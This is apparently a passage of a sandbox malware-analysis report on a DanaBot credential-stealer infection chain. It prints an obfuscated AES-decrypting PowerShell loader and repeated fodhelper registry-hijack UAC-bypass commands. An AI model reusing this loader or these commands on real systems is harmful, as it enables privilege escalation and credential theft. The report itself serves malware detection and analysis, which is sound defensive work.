1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D20530BC9EF65B371EDFBA73316E25945A063D7A28BE0F4070D89BD71D08F1EC1392620E3F9E825A74316A5E9B8A7A70C3FC14D385B0D9F2A32F105EC66DC0B66EF10CB54D88BC0C2EC3C6D8B685C4A14BBFAF410E05F6F6457D7F9DA84102A348A56A4485CC1461217FCCC817704BD60EAE9427F8F126249479DA465DD0953880B50203DFB5DF97FEC094E492A4B417CF22BF841934ED24A0B0560EBF6DC9556D5FFD9549F51C870531BFA2BCFA700AD9EF423262F03922066B86DB35AA36FA7B763DCDD7176D82F2B7AF30B64970FA776C81DE60217D00F4B33DE2484A7526D3027184AB3318A44AC8E56A23A1E7AE21C561807980C57498B0BF9EF2CB743BB88450F5E4C7BFD72EF1467CDC3C67606AB945368DED820465416BA2A5775E52744944EAC6DA3F107DC69F469ACC6AF28A5520C7CF8FF549A145DC7A79D1CA66B1BB307B8BFE97041FB1F1CD07CA9DF7DDFD418D990B4FFF0ECB1DBDCFB5AE09034756A206FCED160FB71D4F142B6F97A20C8E1DF317F55051E54E9076BE72CCAA9E3538A276B4BA3BE1FA5C23EF88B84FED88D1E3F4D6ACF1A58A49CB7C35A80F797F9F1E55D3A01B4D42B956350FAF932B55519B6F7E70D2A0C998AA611AED9BEA8A07706D8B5704FC697F2C676DC5C4C1093EFEF23707B4BD489239CB80D30338E');$PYGob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283)
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:02:47:39
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:02:47:40
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\fodhelper.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:FoDHelper.exe
                                                        Imagebase:0x7ff77fca0000
                                                        File size:49'664 bytes
                                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:21
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:23
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe -w 1 -ep Unrestricted -nop
                                                        Imagebase:0x7ff7b2bb0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:24
                                                        Start time:02:47:41
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:25
                                                        Start time:02:47:42
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:26
                                                        Start time:02:47:42
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:27
                                                        Start time:02:47:42
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:29
                                                        Start time:02:47:48
                                                        Start date:27/12/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
                                                        Imagebase:0x7ff64eb90000
                                                        File size:5'641'176 bytes
                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:30
                                                        Start time:02:47:49
                                                        Start date:27/12/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                        Imagebase:0x7ff63ec50000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:32
                                                        Start time:02:47:49
                                                        Start date:27/12/2024
                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                        Imagebase:0x7ff63ec50000
                                                        File size:3'581'912 bytes
                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:35
                                                        Start time:02:47:57
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:36
                                                        Start time:02:47:57
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:37
                                                        Start time:02:47:57
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:38
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\fodhelper.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:FoDHelper.exe
                                                        Imagebase:0x7ff77fca0000
                                                        File size:49'664 bytes
                                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:39
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:40
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:41
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:42
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:43
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\AppData\Roaming\mama.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\mama.exe
                                                        Imagebase:0x400000
                                                        File size:4'277'248 bytes
                                                        MD5 hash:72B6B07175EF611CE7DAA959A1248AAE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 71%, ReversingLabs
                                                        Has exited:false

                                                        General

                                                        Target ID:44
                                                        Start time:02:47:59
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:45
                                                        Start time:02:47:59
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:46
                                                        Start time:02:47:59
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:47
                                                        Start time:02:48:04
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:48
                                                        Start time:02:48:04
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:49
                                                        Start time:02:48:04
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                        Imagebase:0x10000
                                                        File size:427'008 bytes
                                                        MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FF7C15433B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1289659095.00007FF7C1540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff7c1540000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                          • Instruction ID: 316c64d18543aceb3f47ebab1a7df1447ffaddc0d96fa7c8acbfa0f36cccec58
                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                          • Instruction Fuzzy Hash: AA01677111CB0C4FD784EF0CE451AA5B7E0FB95364F50056DE58AC3661DA36E882CB45

                                                          Executed Functions

                                                          Function 0000016484C92205 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615434412.0000016484C92000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016484C92000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16484c92000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0591caa43e104a6314d98fae717a792e3f07944214478e1ced55d508348fa332
                                                          • Instruction ID: ee7cd59ff8546a5ed94c79973da3b98f5abbb0deb47b2e4b2d4fc9cbba480be9
                                                          • Opcode Fuzzy Hash: 0591caa43e104a6314d98fae717a792e3f07944214478e1ced55d508348fa332
                                                          • Instruction Fuzzy Hash: BE11A53050EB845FEB9B5AF8482D3A5BFD4DB52310F4A44EED446CB1E3E90A4CC98351
                                                          Function 0000016CFFFE0FC1 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Function 0000016CFFFE0FA9 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Function 0000016CFFFE0F99 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Function 0000016CFFFE0F89 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Function 0000016CFFFE0F81 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Function 0000016CFFFE0F79 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2

                                                          Executed Functions

                                                          Function 00007FF7BFD43C06 Relevance: .9, Instructions: 871COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e905bd158df02625dc270cad0cc5a95eb185c14d731b7419937fbf6b616716f3
                                                          • Instruction ID: 5acce6583eb992889cdcf6af75f16a6288386600ce25f71d9aaa3d29d4d203e7
